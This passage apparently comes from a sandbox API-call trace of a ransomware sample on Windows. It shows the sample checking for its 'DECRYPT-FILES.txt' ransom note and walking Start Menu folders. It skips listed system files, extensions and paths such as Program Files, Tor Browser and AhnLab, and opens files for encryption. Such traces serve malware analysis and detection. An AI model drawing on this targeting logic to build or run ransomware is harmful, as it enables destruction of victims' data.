Menu\\Programs\\Accessories\\Accessibility\\") returned 110 [0182.417] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0182.417] wsprintfW (in: param_1=0x36fdb84, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\\\DECRYPT-FILES.txt") returned 128 [0182.417] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.417] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\") returned 110 [0182.417] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\*" [0182.417] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\*", lpFindFileData=0x36fe3a4 | out: lpFindFileData=0x36fe3a4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xefbf6b00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xefbf6b00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479a38 [0182.417] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0182.417] FindNextFileW (in: hFindFile=0x479a38, lpFindFileData=0x36fe3a4 | out: lpFindFileData=0x36fe3a4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xefbf6b00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xefbf6b00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.417] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0182.417] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0182.417] FindNextFileW (in: hFindFile=0x479a38, lpFindFileData=0x36fe3a4 | out: lpFindFileData=0x36fe3a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefbf6b00, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xefbf6b00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xefbf6b00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0182.417] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0182.417] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0182.417] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0182.417] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0182.417] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0182.417] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0182.417] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0182.417] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0182.417] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0182.417] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0182.417] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.417] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0182.417] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0182.418] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0182.418] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0182.418] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\") returned 110 [0182.418] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.418] lstrcpyW (in: lpString1=0x36fdb74, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\" [0182.418] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\0a16c9.tmp" [0182.418] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.418] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.418] CloseHandle (hObject=0x0) returned 0 [0182.418] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.418] FindNextFileW (in: hFindFile=0x479a38, lpFindFileData=0x36fe3a4 | out: lpFindFileData=0x36fe3a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac219a80, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac219a80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac219a80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0182.418] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0182.418] FindNextFileW (in: hFindFile=0x479a38, lpFindFileData=0x36fe3a4 | out: lpFindFileData=0x36fe3a4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d97bc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d97bc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x1b75a077, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x2c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.ini", cAlternateFileName="")) returned 1 [0182.418] lstrcmpiW (lpString1="Desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0182.418] lstrcmpiW (lpString1="Desktop.ini", lpString2="autorun.inf") returned 1 [0182.418] lstrcmpiW (lpString1="Desktop.ini", lpString2="boot.ini") returned 1 [0182.418] lstrcmpiW (lpString1="Desktop.ini", lpString2="desktop.ini") returned 0 [0182.419] FindNextFileW (in: hFindFile=0x479a38, lpFindFileData=0x36fe3a4 | out: lpFindFileData=0x36fe3a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x1ab4d101, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x54e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ease of Access.lnk", cAlternateFileName="EASEOF~1.LNK")) returned 1 [0182.419] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0182.419] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2="autorun.inf") returned 1 [0182.419] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2="boot.ini") returned 1 [0182.419] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2="desktop.ini") returned 1 [0182.419] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2="ntuser.dat") returned -1 [0182.419] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2="iconcache.db") returned -1 [0182.419] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2="bootsect.bak") returned 1 [0182.419] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2="ntuser.dat.log") returned -1 [0182.419] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2="thumbs.db") returned -1 [0182.419] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2="Bootfont.bin") returned 1 [0182.419] lstrlenW (lpString="Ease of Access.lnk") returned 18 [0182.419] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.419] FindNextFileW (in: hFindFile=0x479a38, lpFindFileData=0x36fe3a4 | out: lpFindFileData=0x36fe3a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x1a98407e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x4ea, dwReserved0=0x0, dwReserved1=0x0, cFileName="Magnify.lnk", cAlternateFileName="")) returned 1 [0182.419] lstrcmpiW (lpString1="Magnify.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0182.419] lstrcmpiW (lpString1="Magnify.lnk", lpString2="autorun.inf") returned 1 [0182.419] lstrcmpiW (lpString1="Magnify.lnk", lpString2="boot.ini") returned 1 [0182.419] lstrcmpiW (lpString1="Magnify.lnk", lpString2="desktop.ini") returned 1 [0182.419] lstrcmpiW (lpString1="Magnify.lnk", lpString2="ntuser.dat") returned -1 [0182.419] lstrcmpiW (lpString1="Magnify.lnk", lpString2="iconcache.db") returned 1 [0182.419] lstrcmpiW (lpString1="Magnify.lnk", lpString2="bootsect.bak") returned 1 [0182.419] lstrcmpiW (lpString1="Magnify.lnk", lpString2="ntuser.dat.log") returned -1 [0182.419] lstrcmpiW (lpString1="Magnify.lnk", lpString2="thumbs.db") returned -1 [0182.424] lstrcmpiW (lpString1="Magnify.lnk", lpString2="Bootfont.bin") returned 1 [0182.424] lstrlenW (lpString="Magnify.lnk") returned 11 [0182.424] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.424] FindNextFileW (in: hFindFile=0x479a38, lpFindFileData=0x36fe3a4 | out: lpFindFileData=0x36fe3a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x1b733f17, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x4ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="Narrator.lnk", cAlternateFileName="")) returned 1 [0182.424] lstrcmpiW (lpString1="Narrator.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0182.424] lstrcmpiW (lpString1="Narrator.lnk", lpString2="autorun.inf") returned 1 [0182.424] lstrcmpiW (lpString1="Narrator.lnk", lpString2="boot.ini") returned 1 [0182.424] lstrcmpiW (lpString1="Narrator.lnk", lpString2="desktop.ini") returned 1 [0182.424] lstrcmpiW (lpString1="Narrator.lnk", lpString2="ntuser.dat") returned -1 [0182.425] lstrcmpiW (lpString1="Narrator.lnk", lpString2="iconcache.db") returned 1 [0182.425] lstrcmpiW (lpString1="Narrator.lnk", lpString2="bootsect.bak") returned 1 [0182.425] lstrcmpiW (lpString1="Narrator.lnk", lpString2="ntuser.dat.log") returned -1 [0182.425] lstrcmpiW (lpString1="Narrator.lnk", lpString2="thumbs.db") returned -1 [0182.425] lstrcmpiW (lpString1="Narrator.lnk", lpString2="Bootfont.bin") returned 1 [0182.425] lstrlenW (lpString="Narrator.lnk") returned 12 [0182.425] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.425] FindNextFileW (in: hFindFile=0x479a38, lpFindFileData=0x36fe3a4 | out: lpFindFileData=0x36fe3a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x1aa4275f, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x4e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="On-Screen Keyboard.lnk", cAlternateFileName="ON-SCR~1.LNK")) returned 1 [0182.425] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0182.425] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2="autorun.inf") returned 1 [0182.425] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2="boot.ini") returned 1 [0182.425] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2="desktop.ini") returned 1 [0182.425] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2="ntuser.dat") returned 1 [0182.425] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2="iconcache.db") returned 1 [0182.425] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2="bootsect.bak") returned 1 [0182.425] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2="ntuser.dat.log") returned 1 [0182.425] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2="thumbs.db") returned -1 [0182.425] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2="Bootfont.bin") returned 1 [0182.425] lstrlenW (lpString="On-Screen Keyboard.lnk") returned 22 [0182.425] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.425] FindNextFileW (in: hFindFile=0x479a38, lpFindFileData=0x36fe3a4 | out: lpFindFileData=0x36fe3a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x1aa4275f, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x4e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="On-Screen Keyboard.lnk", cAlternateFileName="ON-SCR~1.LNK")) returned 0 [0182.425] FindClose (in: hFindFile=0x479a38 | out: hFindFile=0x479a38) returned 1 [0182.425] CloseHandle (hObject=0x28c) returned 1 [0182.425] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2a53d8cd, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x500, dwReserved0=0x0, dwReserved1=0x0, cFileName="Command Prompt.lnk", cAlternateFileName="COMMAN~1.LNK")) returned 1 [0182.425] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0182.425] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="autorun.inf") returned 1 [0182.425] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="boot.ini") returned 1 [0182.425] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="desktop.ini") returned -1 [0182.426] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="ntuser.dat") returned -1 [0182.426] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="iconcache.db") returned -1 [0182.426] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="bootsect.bak") returned 1 [0182.426] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="ntuser.dat.log") returned -1 [0182.426] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="thumbs.db") returned -1 [0182.426] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="Bootfont.bin") returned 1 [0182.426] lstrlenW (lpString="Command Prompt.lnk") returned 18 [0182.426] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.426] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac1f3920, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac1f3920, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac1f3920, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0182.426] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0182.426] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d76088a, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x2a6, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.ini", cAlternateFileName="")) returned 1 [0182.426] lstrcmpiW (lpString1="Desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0182.426] lstrcmpiW (lpString1="Desktop.ini", lpString2="autorun.inf") returned 1 [0182.426] lstrcmpiW (lpString1="Desktop.ini", lpString2="boot.ini") returned 1 [0182.426] lstrcmpiW (lpString1="Desktop.ini", lpString2="desktop.ini") returned 0 [0182.426] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d73a72a, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x518, dwReserved0=0x0, dwReserved1=0x0, cFileName="Notepad.lnk", cAlternateFileName="")) returned 1 [0182.426] lstrcmpiW (lpString1="Notepad.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0182.426] lstrcmpiW (lpString1="Notepad.lnk", lpString2="autorun.inf") returned 1 [0182.426] lstrcmpiW (lpString1="Notepad.lnk", lpString2="boot.ini") returned 1 [0182.426] lstrcmpiW (lpString1="Notepad.lnk", lpString2="desktop.ini") returned 1 [0182.426] lstrcmpiW (lpString1="Notepad.lnk", lpString2="ntuser.dat") returned -1 [0182.426] lstrcmpiW (lpString1="Notepad.lnk", lpString2="iconcache.db") returned 1 [0182.426] lstrcmpiW (lpString1="Notepad.lnk", lpString2="bootsect.bak") returned 1 [0182.426] lstrcmpiW (lpString1="Notepad.lnk", lpString2="ntuser.dat.log") returned -1 [0182.426] lstrcmpiW (lpString1="Notepad.lnk", lpString2="thumbs.db") returned -1 [0182.426] lstrcmpiW (lpString1="Notepad.lnk", lpString2="Bootfont.bin") returned 1 [0182.426] lstrlenW (lpString="Notepad.lnk") returned 11 [0182.426] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.426] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7dfec52d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x106, dwReserved0=0x0, dwReserved1=0x0, cFileName="Run.lnk", cAlternateFileName="")) returned 1 [0182.426] lstrcmpiW (lpString1="Run.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0182.426] lstrcmpiW (lpString1="Run.lnk", lpString2="autorun.inf") returned 1 [0182.426] lstrcmpiW (lpString1="Run.lnk", lpString2="boot.ini") returned 1 [0182.426] lstrcmpiW (lpString1="Run.lnk", lpString2="desktop.ini") returned 1 [0182.426] lstrcmpiW (lpString1="Run.lnk", lpString2="ntuser.dat") returned 1 [0182.426] lstrcmpiW (lpString1="Run.lnk", lpString2="iconcache.db") returned 1 [0182.426] lstrcmpiW (lpString1="Run.lnk", lpString2="bootsect.bak") returned 1 [0182.427] lstrcmpiW (lpString1="Run.lnk", lpString2="ntuser.dat.log") returned 1 [0182.427] lstrcmpiW (lpString1="Run.lnk", lpString2="thumbs.db") returned -1 [0182.427] lstrcmpiW (lpString1="Run.lnk", lpString2="Bootfont.bin") returned 1 [0182.427] lstrlenW (lpString="Run.lnk") returned 7 [0182.427] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.427] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xac219a80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac219a80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System Tools", cAlternateFileName="SYSTEM~1")) returned 1 [0182.427] lstrcmpW (lpString1="System Tools", lpString2=".") returned 1 [0182.427] lstrcmpW (lpString1="System Tools", lpString2="..") returned 1 [0182.427] lstrcatW (in: lpString1="System Tools", lpString2="\\" | out: lpString1="System Tools\\") returned="System Tools\\" [0182.427] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpString2="System Tools\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\" [0182.427] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\", lpSrch="\\Program Files") returned 0x0 [0182.427] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\", lpSrch=":\\Windows") returned 0x0 [0182.427] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\", lpSrch="\\Games\\") returned 0x0 [0182.427] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\", lpSrch="\\Tor Browser\\") returned 0x0 [0182.427] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\", lpSrch="\\ProgramData\\") returned 0x0 [0182.427] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0182.427] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0182.427] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0182.427] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\", lpSrch="\\All Users") returned 0x0 [0182.427] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\", lpSrch="\\IETldCache\\") returned 0x0 [0182.427] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\", lpSrch="\\Local Settings\\") returned 0x0 [0182.427] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\", lpSrch="\\AppData\\Local") returned 0x0 [0182.427] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\", lpSrch="AhnLab") returned 0x0 [0182.427] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0182.427] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\") returned 109 [0182.427] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.427] wsprintfW (in: param_1=0x36fdb84, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\\\0a16c9.tmp") returned 120 [0182.427] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, 